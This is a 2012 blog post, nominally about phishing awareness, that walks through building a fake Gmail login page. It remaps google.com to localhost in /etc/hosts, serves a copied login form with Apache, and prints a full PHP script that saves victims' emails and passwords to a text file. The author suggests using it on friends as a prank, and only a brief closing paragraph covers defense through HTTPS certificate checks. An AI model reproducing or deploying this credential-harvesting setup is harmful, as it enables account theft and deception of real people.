Monday, July 23, 2012

How to phish and not to get phished



With the increase in commercial transactions online and a whole lot of information online, the need to secure it also increases because it is still people on the Internet and the sense of security and insecurity is innate to our interactions.

Phishing (of course,read it as fishing :P) is one of the most treacherous menaces which could have really bad ramifications -  loss of money, passwords and compromise of sensitive information.

In this post, I show how the simplest phishing trick is performed (thanks to Vignesh T Prabhu for showing me this trick), so that avoiding it can also be made effective. This trick is an offline version, and it takes simple extra gyaan to put it online.

Based on my experience with the audience I have been dealing with, I will touch upon some fundamentals like DNS, Apache Webserver, GNU/Linux directory structure and some bit of coding.

DNS Server:

Domain Name System servers are lookup tables used to map URLs to IP addresses ( a more elaborate post about it here).
For our trick here, we will need only to know that the fist level of name resolution in a GNU/Linux machine happens in the file /etc/hosts.
All GNU/Linux machines have first level DNS resolution here and standard entries might look like this :


Because in Phsihing we purport to be a webpage we are not, I usually add use the localhost as the webserver.
For instance, you could try ping google.com and it might yield a reply from a specific IP address as shown below


Here the name resolution is happening for google.com to 74.125.236.206
I our case I will try to make the localhost as google.com, for example.
Then add this entry in the /etc/hosts file

sudo nano /etc/hosts (to edit the file)
and append
google.com     127.0.0.1
save it.
where 127.0.0.1 is one of the loopback ethernet interfaces.

Now try pinging google.com, and the reply looks like this




Apache Webserver

The awesomeness of running a GNU/Linux box is in the fact that you have a "server" with you - an almost full fledged server. For our hack here, we need to be running a webserver and who else but the master of all webservers Apache runs like a charm on any GNU/Linux distro.

Install Apache (in debian based OS)

sudo apt-get install apache2

Once installed, check if the server is running - open a web browser and enter localhost, and the default page must be as shown below:


Now, also try entering google.com in the browser and it should land on the same default webpage


Now, we're ready to phish.

HTML file:

Log on to the google mail login page, and copy the source code (ctrl+u to view source code) of the file into a text document.

Find the action field and replace the google authentication URL with "phishing.php" (a php script we will be using to phish)
Save the html file as something relevant, for example login.hmtl

PHP script:

Here's a simple PHP script which will capture the login name and password on the phishing page and redirect to original authentication page.

<html>
<body>
<?php
$handle=fopen("Password.txt","a");
fwrite($handle,$_POST["Email id:"]);
fwrite($handle,"\n");
fwrite($handle,$_POST["Password:"]);
fwrite($handle,"\n");
fwrite($handle,"\n");
fclose($handle);
header("Location:https://www.google.com/accounts/ServiceLoginAuth");
exit;
?>
</body>
</html>


PHP script, save it as phishing.php

Create an empty text document password.txt.

Now, copy the three files login.html, phishing.php and password.txt to the default web server location /var/www

sudo cp login.html phishing.php password.txt /var/www

The password.txt file needs to have write permissions by the phoshing.php script - a easy and lazy way to do it is

sudo chmod 777 /var/www/password.txt

Now, you can dupe any of your friends for a prank and get them login to their google mail account and check the password.txt file to know their password, without them having a doubt of what has occurred.

The solution:

HTTPS browsing is the safest means of web browsing, and a quick verification of certificates would reveal us the real identities of these webpages.

For, the original google mail page will have an SSL certificate signed and verified, where as the phishing script won't.
Use https everywhere by EFF to avoid most of the attempts :)
Phishing page without secure connection and a warning

Secure login page with SSL certification

No comments:

Post a Comment